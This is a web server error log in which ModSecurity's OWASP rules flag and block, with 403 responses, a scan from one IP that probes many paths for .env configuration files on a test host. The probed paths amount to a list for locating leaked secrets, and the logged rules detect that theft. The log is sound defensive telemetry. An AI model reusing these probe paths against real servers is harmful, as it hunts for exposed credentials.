[Thu Jan 08 21:17:45.279297 2026] [:error] [pid 1270041] [client 18.119.100.98:50372] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.production"] [unique_id "aWAQ6c3GwEx_BV8-CrWURQAAAAU"]
[Thu Jan 08 21:17:45.633338 2026] [:error] [pid 1270042] [client 18.119.100.98:50518] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "aWAQ6S7RlX2cRjHcFz6xwQAAAAY"]
[Thu Jan 08 21:17:45.633568 2026] [:error] [pid 1270042] [client 18.119.100.98:50518] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "aWAQ6S7RlX2cRjHcFz6xwQAAAAY"]
[Thu Jan 08 21:17:45.633719 2026] [:error] [pid 1270042] [client 18.119.100.98:50518] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "aWAQ6S7RlX2cRjHcFz6xwQAAAAY"]
[Thu Jan 08 21:17:45.979430 2026] [:error] [pid 1283304] [client 18.119.100.98:50636] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.local"] [unique_id "aWAQ6WAwUIZgFNkik8yVPAAAAAg"]
[Thu Jan 08 21:17:45.979639 2026] [:error] [pid 1283304] [client 18.119.100.98:50636] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.local"] [unique_id "aWAQ6WAwUIZgFNkik8yVPAAAAAg"]
[Thu Jan 08 21:17:45.979798 2026] [:error] [pid 1283304] [client 18.119.100.98:50636] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.local"] [unique_id "aWAQ6WAwUIZgFNkik8yVPAAAAAg"]
[Thu Jan 08 21:17:46.327686 2026] [:error] [pid 1270036] [client 18.119.100.98:50762] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env"] [unique_id "aWAQ6uM1154Q6b0hewij5QAAAAE"]
[Thu Jan 08 21:17:46.327911 2026] [:error] [pid 1270036] [client 18.119.100.98:50762] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env"] [unique_id "aWAQ6uM1154Q6b0hewij5QAAAAE"]
[Thu Jan 08 21:17:46.328072 2026] [:error] [pid 1270036] [client 18.119.100.98:50762] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env"] [unique_id "aWAQ6uM1154Q6b0hewij5QAAAAE"]
[Thu Jan 08 21:17:46.673458 2026] [:error] [pid 1270037] [client 18.119.100.98:50882] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aWAQ6uA_IfWyU2EIiRhOhQAAAAI"]
[Thu Jan 08 21:17:46.673665 2026] [:error] [pid 1270037] [client 18.119.100.98:50882] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aWAQ6uA_IfWyU2EIiRhOhQAAAAI"]
[Thu Jan 08 21:17:46.673821 2026] [:error] [pid 1270037] [client 18.119.100.98:50882] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aWAQ6uA_IfWyU2EIiRhOhQAAAAI"]
[Thu Jan 08 21:17:47.022939 2026] [:error] [pid 1280390] [client 18.119.100.98:51002] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.local"] [unique_id "aWAQ69KTJIy7S9W5nL2LQAAAAAk"]
[Thu Jan 08 21:17:47.023158 2026] [:error] [pid 1280390] [client 18.119.100.98:51002] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.local"] [unique_id "aWAQ69KTJIy7S9W5nL2LQAAAAAk"]
[Thu Jan 08 21:17:47.023313 2026] [:error] [pid 1280390] [client 18.119.100.98:51002] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.local"] [unique_id "aWAQ69KTJIy7S9W5nL2LQAAAAAk"]
[Thu Jan 08 21:17:47.367602 2026] [:error] [pid 1270038] [client 18.119.100.98:51118] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.staging"] [unique_id "aWAQ6xmwMJtANIcuNUXpJQAAAAM"]
[Thu Jan 08 21:17:47.367812 2026] [:error] [pid 1270038] [client 18.119.100.98:51118] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.staging"] [unique_id "aWAQ6xmwMJtANIcuNUXpJQAAAAM"]
[Thu Jan 08 21:17:47.367965 2026] [:error] [pid 1270038] [client 18.119.100.98:51118] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.staging"] [unique_id "aWAQ6xmwMJtANIcuNUXpJQAAAAM"]
[Thu Jan 08 21:17:47.713734 2026] [:error] [pid 1270039] [client 18.119.100.98:51226] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.local"] [unique_id "aWAQ65ccQYhM1DUhi_W7CgAAAAQ"]
[Thu Jan 08 21:17:47.713955 2026] [:error] [pid 1270039] [client 18.119.100.98:51226] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.local"] [unique_id "aWAQ65ccQYhM1DUhi_W7CgAAAAQ"]
[Thu Jan 08 21:17:47.714120 2026] [:error] [pid 1270039] [client 18.119.100.98:51226] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.local"] [unique_id "aWAQ65ccQYhM1DUhi_W7CgAAAAQ"]
[Thu Jan 08 21:17:48.059618 2026] [:error] [pid 1270043] [client 18.119.100.98:51354] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "aWAQ7AvEr1EpOYnVfM6rxQAAAAc"]
[Thu Jan 08 21:17:48.059826 2026] [:error] [pid 1270043] [client 18.119.100.98:51354] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "aWAQ7AvEr1EpOYnVfM6rxQAAAAc"]
[Thu Jan 08 21:17:48.060030 2026] [:error] [pid 1270043] [client 18.119.100.98:51354] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs"] [unique_id "aWAQ7AvEr1EpOYnVfM6rxQAAAAc"]
[Thu Jan 08 21:17:48.402173 2026] [:error] [pid 1270035] [client 18.119.100.98:51450] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.local"] [unique_id "aWAQ7CYqm_i2BUcmtQb4ugAAAAA"]
[Thu Jan 08 21:17:48.402416 2026] [:error] [pid 1270035] [client 18.119.100.98:51450] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.local"] [unique_id "aWAQ7CYqm_i2BUcmtQb4ugAAAAA"]
[Thu Jan 08 21:17:48.402595 2026] [:error] [pid 1270035] [client 18.119.100.98:51450] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.local"] [unique_id "aWAQ7CYqm_i2BUcmtQb4ugAAAAA"]
[Thu Jan 08 21:17:48.742894 2026] [:error] [pid 1270041] [client 18.119.100.98:51574] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/APP/.env"] [unique_id "aWAQ7M3GwEx_BV8-CrWURgAAAAU"]
[Thu Jan 08 21:17:48.743147 2026] [:error] [pid 1270041] [client 18.119.100.98:51574] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/APP/.env"] [unique_id "aWAQ7M3GwEx_BV8-CrWURgAAAAU"]
[Thu Jan 08 21:17:48.743316 2026] [:error] [pid 1270041] [client 18.119.100.98:51574] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/APP/.env"] [unique_id "aWAQ7M3GwEx_BV8-CrWURgAAAAU"]
[Thu Jan 08 21:17:49.090296 2026] [:error] [pid 1270042] [client 18.119.100.98:51690] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.staging"] [unique_id "aWAQ7S7RlX2cRjHcFz6xwgAAAAY"]
[Thu Jan 08 21:17:49.090551 2026] [:error] [pid 1270042] [client 18.119.100.98:51690] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.staging"] [unique_id "aWAQ7S7RlX2cRjHcFz6xwgAAAAY"]
[Thu Jan 08 21:17:49.090705 2026] [:error] [pid 1270042] [client 18.119.100.98:51690] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.staging"] [unique_id "aWAQ7S7RlX2cRjHcFz6xwgAAAAY"]
[Thu Jan 08 21:17:49.443370 2026] [:error] [pid 1283304] [client 18.119.100.98:51810] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.local"] [unique_id "aWAQ7WAwUIZgFNkik8yVPQAAAAg"]
[Thu Jan 08 21:17:49.443579 2026] [:error] [pid 1283304] [client 18.119.100.98:51810] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.local"] [unique_id "aWAQ7WAwUIZgFNkik8yVPQAAAAg"]
[Thu Jan 08 21:17:49.443740 2026] [:error] [pid 1283304] [client 18.119.100.98:51810] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.local"] [unique_id "aWAQ7WAwUIZgFNkik8yVPQAAAAg"]
[Thu Jan 08 21:17:49.788688 2026] [:error] [pid 1270036] [client 18.119.100.98:51906] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.production"] [unique_id "aWAQ7eM1154Q6b0hewij5gAAAAE"]
[Thu Jan 08 21:17:49.788917 2026] [:error] [pid 1270036] [client 18.119.100.98:51906] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.production"] [unique_id "aWAQ7eM1154Q6b0hewij5gAAAAE"]
[Thu Jan 08 21:17:49.789131 2026] [:error] [pid 1270036] [client 18.119.100.98:51906] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.production"] [unique_id "aWAQ7eM1154Q6b0hewij5gAAAAE"]
